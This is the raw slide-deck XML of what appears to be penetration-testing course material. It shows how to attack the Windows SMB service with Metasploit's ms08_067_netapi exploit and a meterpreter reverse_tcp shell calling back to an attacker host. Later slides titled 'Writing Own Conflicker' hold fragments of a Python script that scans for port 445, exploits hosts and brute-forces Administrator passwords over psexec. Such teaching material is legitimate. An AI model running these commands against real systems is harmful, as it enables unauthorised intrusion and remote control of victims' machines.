              <a:t>Metasploit allows penetration testers to launch thousands of different computer exploits from a standard zed and scriptable environment.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Use exploit/windows/smb/ms08_067_netapi</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Set RHOST 192.168.1.37</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Set PAYLOAD windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Set LHost 192.168.77.77 </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Set LPORT 7777</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Exploit –j -z</a:t>
            </a:r>
            <a:endParaRPr>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g1e9a65c21fa_41_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148396" y="8023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Attacking the Windows SMB Service with Metasploit</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="726" name="Google Shape;726;g1e9a65c21fa_41_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148396" y="2888195"/>
            <a:ext cx="11216306" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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This statement describes the use of the Metasploit Framework to simplify an attack. Metasploit is an open-source computer security project that provides a framework for developing and executing exploits. It allows penetration testers to launch thousands of different computer exploits from a standard and scriptable environment. The Metasploit Framework is available for download from the Metasploit website (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://metasploit.com/download/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>However, it's important to note that the same capabilities that make Metasploit useful for security professionals can also be used by attackers to launch real-world attacks. Therefore, it is important to use Metasploit responsibly and for legal and ethical purposes only. Additionally, it is important to keep in mind that even if the vulnerabilities are identified and fixed, new ones will likely be found in the future.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727" name="Google Shape;727;g1e9a65c21fa_41_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273423" y="2320746"/>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g1e9a65c21fa_41_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148396" y="8023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Attacking the Windows SMB Service with Metasploit</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="733" name="Google Shape;733;g1e9a65c21fa_41_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2456272"/>
            <a:ext cx="11962613" cy="35994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sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Metasploit has become popular over the last eight years and is considered the de facto exploitation toolkit in the field of penetration testing and ethical hacking. It allows penetration testers to test the security of a system by simulating an attack and identifying vulnerabilities. The Metasploit Framework contains a large collection of exploits, payloads, and modules that can be used to test various types of systems and applications, making it a powerful tool for security professionals.</a:t>
            </a:r>
            <a:endParaRPr>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g1e9a65c21fa_46_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286599" y="2171575"/>
            <a:ext cx="11533200" cy="4402200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="10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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To utilize Metasploit's attack, we first chose our exploit (exploit/windows/ smb/ms08_067_netapi) and then set the target to 192.168.1.37.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215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="10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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Following target selection, we indicated the payload as windows/meterpreter/reverse_tcp and selected a reverse connection to our host at 192.168.77.77 on port 7777. Finally, we told Metasploit to exploit the system. Saving the configuration file to the filename conficker.rc, we can now launch our attack by issuing the command msfconsole -r conficker.rc. </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="10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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This command will tell Metasploit to launch with the conficker.rc configuration file. When successful, our attack returns a Windows command shell to control the machine.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="14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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>attackers msfconsole -r conficker.rc</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="20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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>meterpreter&gt; execute –I –f cmd.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="10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215900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="739" name="Google Shape;739;g1e9a65c21fa_46_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="810200"/>
            <a:ext cx="10671600" cy="1071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Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>Attacking the Windows SMB Service with Metasploit</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>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g1e9a65c21fa_46_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="117150" y="2878577"/>
            <a:ext cx="11892598" cy="3477835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="10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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This passage is describing a process for using the Metasploit framework to launch an attack on a target computer with the IP address of 192.168.1.37. </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="14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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The specific exploit being used is "exploit/windows/smb/ms08_067_netapi" which targets a vulnerability in the Windows SMB service. </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="14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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The payload being used is "windows/meterpreter/reverse_tcp", which will give the attacker a command shell on the target system, and a reverse connection is established back to the attacker's host at IP address 192.168.77.77 on port 7777. </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="14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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The configuration for this attack is saved to a file named "conficker.rc" and the attack is launched by running the command "msfconsole -r conficker.rc" in the command line. </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="14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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The final command shows the meterpreter session, where the attacker can run other command such as execute, -I and -f cmd.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Google Shape;745;g1e9a65c21fa_46_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="810200"/>
            <a:ext cx="10671600" cy="1071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Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>Attacking the Windows SMB Service with Metasploit</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Google Shape;746;g1e9a65c21fa_46_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="117150" y="2091113"/>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3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Writing Own Conflicker</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752" name="Google Shape;752;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375975" y="2080175"/>
            <a:ext cx="11183400" cy="4700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argparse</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E5C07B"/>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import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nmap</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find_tgts</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subnet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nmap_scan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nmap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PortScanner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nmap_scan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scan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subnet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'445'</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hosts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nmap_scan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all_hosts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nmap_scan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has_tcp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445</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state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nmap_scan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'tcp'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445</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'state'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state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print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 Found Target Host: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hosts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append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return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hosts</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>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e9adf94182_2_39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91096" y="8514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TCP Full Connect Scan </a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;g1e9adf94182_2_39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91096" y="3050405"/>
            <a:ext cx="11390700" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The passage is describing how to create a TCP port scanner using Python's BSD socket API. The purpose of the scanner is to identify open ports on a target host using a TCP full connect scan. To start the process, the passage is importing the Python implementation of BSD socket API. This API provides some useful functions that will be used in the implementation of the scanner.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The first function mentioned is socket.gethostbyname(hostname) which takes a hostname (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.syngress.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) as an input and returns an IPv4 address format (such as 69.163.177.2) for that hostname.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The second function is socket.gethostbyaddr(ip address) which takes an IPv4 address as an input and returns a triple containing the hostname, alternative list of host names, and a list of IPv4/v6 addresses for the same interface on the host.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="469900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;g1e9adf94182_2_39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565609" y="2282383"/>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g1fe188b01e2_0_8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Writing Own Conflicker</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758" name="Google Shape;758;g1fe188b01e2_0_80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375975" y="2080175"/>
            <a:ext cx="11183400" cy="4700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setup_handler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lhost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lport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'use exploit/multi/handler</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'set payload windows/meterpreter/reverse_tcp</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LPORT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lport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LHOST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lhost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'exploit -j -z</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'setg DisablePayloadHandler 1</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conficker_exploit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lhost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lport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'use exploit/windows/smb/ms08_067_netapi</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RHOST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'set payload windows/meterpreter/reverse_tcp</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LPORT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lport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LHOST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lhost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'exploit -j -z</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g1fe188b01e2_0_8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Writing Own Conflicker</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764" name="Google Shape;764;g1fe188b01e2_0_86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375975" y="2080175"/>
            <a:ext cx="11183400" cy="4700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setup_handler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lhost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lport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'use exploit/multi/handler</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'set payload windows/meterpreter/reverse_tcp</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LPORT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lport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LHOST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lhost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'exploit -j -z</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'setg DisablePayloadHandler 1</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conficker_exploit</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lhost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lport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'use exploit/windows/smb/ms08_067_netapi</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RHOST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'set payload windows/meterpreter/reverse_tcp</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LPORT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lport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LHOST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lhost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'exploit -j -z</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g1fe188b01e2_0_9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Writing Own Conflicker</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="770" name="Google Shape;770;g1fe188b01e2_0_91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375975" y="2080175"/>
            <a:ext cx="11183400" cy="4700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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def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smb_brute</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passwd_file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lhost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lport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'Administrator'</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with</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passwd_file</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readlines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strip</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\r</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'use exploit/windows/smb/psexec</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SMBUser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username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SMBPass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password</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RHOST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host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'set payload windows/meterpreter/reverse_tcp</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LPORT </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lport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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
